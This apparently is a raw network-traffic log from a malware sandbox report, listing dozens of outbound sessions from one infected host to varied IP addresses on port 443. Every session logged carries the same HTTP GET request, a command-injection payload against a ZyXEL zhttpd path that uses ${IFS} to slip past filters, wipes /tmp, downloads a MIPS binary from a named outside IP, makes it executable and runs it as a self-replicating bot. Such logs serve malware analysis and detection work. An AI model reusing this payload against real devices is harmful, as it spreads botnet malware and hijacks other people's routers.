                                                Jan 12, 2024 18:24:54.311078072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9134192.168.2.1333028151.1.247.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.311131001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9135192.168.2.1351210190.106.17.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.311182022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9136192.168.2.1350662185.167.150.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.311242104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9137192.168.2.135308878.63.245.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.311316967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9138192.168.2.1340212204.24.34.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.311352968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9139192.168.2.1334864179.137.40.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.311420918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9140192.168.2.1336962119.6.131.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.311470032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9141192.168.2.1340928133.30.147.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.311500072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9142192.168.2.134900046.187.156.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.311547041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9143192.168.2.1340028206.241.163.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.311614990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9144192.168.2.1349738181.68.76.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.311667919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9145192.168.2.135933267.212.190.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.311727047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9146192.168.2.133430689.171.107.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.311770916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9147192.168.2.135905249.252.63.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.311836958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9148192.168.2.1357838186.173.226.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.311914921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9149192.168.2.1356984222.245.167.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.311971903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9150192.168.2.1358990117.197.240.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.312010050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9151192.168.2.134230045.111.131.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.312068939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9152192.168.2.1337482106.202.195.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.312127113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9153192.168.2.1350922111.24.119.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.312154055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9154192.168.2.1346246179.146.224.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.312212944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9155192.168.2.133477275.0.181.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.312283039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9156192.168.2.1340716135.117.205.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.312335968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9157192.168.2.1350412198.215.57.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.312381029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9158192.168.2.134603863.157.245.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.312439919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9159192.168.2.1345386217.249.228.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.312498093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9160192.168.2.1336892194.52.98.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.312547922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9161192.168.2.134301027.248.14.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.312614918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9162192.168.2.134028682.114.1.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.312669039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9163192.168.2.133344699.75.222.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.312740088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9164192.168.2.1345054172.52.206.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.312814951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9165192.168.2.1346038222.79.82.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.312871933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9166192.168.2.1335274156.189.203.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.312910080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9167192.168.2.1345506219.99.147.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.312972069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9168192.168.2.13457085.129.224.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.313029051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9169192.168.2.1354272212.254.70.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.313079119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9170192.168.2.1334068136.252.60.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.313146114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9171192.168.2.1347750205.39.215.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.313183069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9172192.168.2.135163645.29.195.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.313234091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9173192.168.2.134707061.18.196.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.313297033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9174192.168.2.1335574108.244.62.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.313328981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9175192.168.2.135049860.228.91.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.313405991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9176192.168.2.1349322194.20.106.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.313441992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9177192.168.2.1345006103.238.138.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.313513994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9178192.168.2.133446265.76.161.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.313580990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9179192.168.2.133939046.226.135.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.313613892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9180192.168.2.136032657.239.77.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.313669920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9181192.168.2.134231896.180.102.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.313718081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9182192.168.2.1339168220.154.69.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.313786030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9183192.168.2.13431322.166.245.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.313817978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9184192.168.2.1342332108.99.162.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.313895941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9185192.168.2.1355982182.172.198.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.313927889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9186192.168.2.135020678.230.227.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.313976049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9187192.168.2.1354680155.48.30.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.314029932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9188192.168.2.134495661.64.48.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.314106941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9189192.168.2.1337166120.85.171.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.314172029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9190192.168.2.135940863.119.137.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.314330101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9191192.168.2.1333174196.176.172.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.314364910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9192192.168.2.135511227.85.103.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.314410925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9193192.168.2.1353794120.192.70.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.314486980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9194192.168.2.1337576181.95.90.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.314516068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9195192.168.2.134353277.68.126.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.314573050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9196192.168.2.1334784219.177.14.98443
                                                TimestampBytes transferredDirectionData
